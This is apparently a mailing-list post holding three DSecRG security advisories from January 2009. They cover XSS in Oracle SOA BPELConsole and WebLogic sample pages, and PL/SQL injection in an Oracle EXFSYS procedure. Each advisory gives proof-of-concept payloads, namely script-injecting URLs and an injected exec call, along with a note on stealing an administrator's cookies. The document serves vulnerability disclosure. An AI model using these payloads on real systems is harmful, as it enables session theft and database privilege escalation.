Advisories for Oracle CPU January 2009 vulnerabilities Attached. Polyakov Alexandr Information Security Analyst ______________________ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polyakov@xxxxxxx www.dsec.ru ----------------------------------- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. -----------------------------------
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-001 Application: Oracle Application Server (SOA) Versions Affected: Oracle Application Server (SOA) version 10.1.3.1.0 Vendor URL: http://www.oracle.com Bugs: XSS Exploits: YES Reported: 10.01.2008 Vendor response: 11.01.2008 Date of Public Advisory: 13.01.2009 CVE: CVE-2008-4014 Description: XSS IN BPELCONSOLE/DEFAULT/ACTIVITIES.JSP Author: Alexandr Polyakov Digital Security Reasearch Group [DSecRG] (research [at] dsec [dot] ru) Description *********** Linked XSS vulnerability found in BPEL module of Oracle Application Server (Oracle SOA Suite). Details ******* Linked XSS vulnerability found in BPEL module. In page BPELConsole/default/activities.jsp attacker can inject XSS by appending it to URL Example ******* http://[localhost]:8888/BPELConsole/default/activities.jsp?'><script>alert('DSEC_XSS')</script>=DSecRG Attacker must send injected link to administrator and get adminiatrators cookie. Code with injected XSS: ---------------------------------------------------------------- </th> <th id="activityLabel" class="ListHeader" align="left" nowrap> <a href='activities.jsp?'><script>alert('DSecRG_XSS')</script>=DSecRG&orderBy=label' class=HeaderLink> Activity Label </a> </th> --------------------------------------------------------------------------- Fix Information *************** Information was published in CPU January 2009. All customers can download CPU petches following instructions from: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html Credits ******* Oracle give a credits for Alexander Polyakov from Digital Security Company in CPU January 2009. http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html About ***** Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact: research [at] dsec [dot] ru http://www.dsecrg.ru http://www.dsec.ru
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-002 Application: Oracle BEA Weblogic 10 Versions Affected: Oracle BEA Weblogic 10 Vendor URL: http://oracle.com Bugs: Multiple XSS Vulnerabilities in samples Exploits: YES Reported: 16.07.2008 Vendor response: 18.07.2008 Last response: 30.10.2008 Description: reviewService sample of WebLogic Server. Date of Public Advisory: 13.01.2009 Authors: Alexandr Polyakov Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *********** Multiple XSS Vulnerabilities found in Oracle BEA Weblogic Server samples version 10.2 and latest. Details ******* Vulnerabilities found in reviewService sample of Weblogic Server. 1. Linked XSS found in createArtist_service.jsp page. Vulnerable parameter "name" Example ******* http://testserver.com:7001/reviewService/createArtist_service.jsp?name=<script>alert('DSECRG')</script> 2. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "title" Example ******* http://testserver.com:7001/reviewService/addBooks_session_ejb21.jsp?name=111&title=<script>alert('DSECRG')</script> 3. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "rating" Example ******* http://testserver.com:7001/reviewService/addReview_service.jsp?comment=111&rating=<script>alert('DSECRG')</script> 4. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "rating" Example ******* http://testserver.com:7001/reviewService/addReview_session.jsp?comment=111&rating=<script>alert('DSECRG')</script> 5. Also there are a couple of XSS vulnerabilities in POST parameters in scripts: http://testserver.com:7001/reviewService/examplesWebApp/JWS_WebService.jsp http://testserver.com:7001/reviewService/ClientServlet http://testserver.com:7001/reviewService/InterceptorClientServlet http://testserver.com:7001/reviewService/createArtist_service.jsp http://testserver.com:7001/reviewService/createArtist_session.jsp Fix Information *************** This is Security-In-Depth vulnerability, because was found in samples.(http://www.oracle.com/technology/deploy/security/cpu/cpufaq.htm) Vulnerability issues that result in significant modification of Oracle code or documentation in future releases, but are not of such a critical nature that they are distributed in Critical Patch Updates. http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html Credits ******* Oracle give a credits for Alexander Polyakov from Digital Security Company in Security-In-Depth program of CPU January 2009. http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html About ***** Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact: research [at] dsec [dot] ru http://www.dsecrg.ru http://www.dsec.ru
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-003 Application: Oracle database 11G Versions Affected: Oracle 11.1.0.6 and 10.2.0.1 Vendor URL: http://oracle.com Bugs: PL/SQL Injections Exploits: YES Reported: 17.11.2008 Vendor response: 18.11.2008 Last response: 24.11.2008 Date of Public Advisory: 13.01.2009 Authors: Alexandr Polyakov Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *********** Oracle Database 11G vulnerable to PL/SQL Injection. Vulnerability found in Extended filter system (EXFSYS). Details ******* PL/SQL Injection found in procedure EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS (maybe other functions in this package) Procedure EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS executes with rights of user EXFSYS. If Attacker have access to EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS. he can do all things with EXFSYS user rights; By default user EXFSYS have privelege "CREATE LIBRARY" and "CREATE ANY TRIGGER". So he teoretically can get access to OS. it can only be exploited by an attacker who is either running as a privileged users, e.g. as EXFSYS or SYS, or on a system where access to the EXFSYS routines has been granted to unprivileged users so this a defense in depth issue. EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS has 4 parameters TAB_OWNER TAB_NAME EXP_COLUMN ASET_NM "ASET_NM" is vulnerable to SQL Injection Example: ******* exec EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS('EXFSYS','EXF$VERSION','EXFVER SION','YYYYYYY'' and 1=EVILPROC()--') Vulnerable Request in v$sql log file *********************************** SELECT attribute, data_type from ADM_EXPFIL_ATTRIBUTES where owner = 'EXFSYS' and attribute_set_name = 'YYYYYYY' and EVILPROC()=EVILPROC()--' and table_alias = 'NO' and (data_type like 'VARCHAR(%)' or data_type like 'VARCHAR2(%)' or data_type = 'INT' or data_type = 'INTEGER' or data_type = 'NUMBER' or data_type = 'DATE') Fix Information *************** This is Security-In-Depth vulnerability.(http://www.oracle.com/technology/deploy/security/cpu/cpufaq.htm) Vulnerability issues that result in significant modification of Oracle code or documentation in future releases, but are not of such a critical nature that they are distributed in Critical Patch Updates. http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html Credits ******* Oracle give a credits for Alexander Polyakov from Digital Security Company in Security-In-Depth program of CPU January 2009. http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html About ***** Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact: research [at] dsec [dot] ru http://www.dsecrg.ru http://www.dsec.ru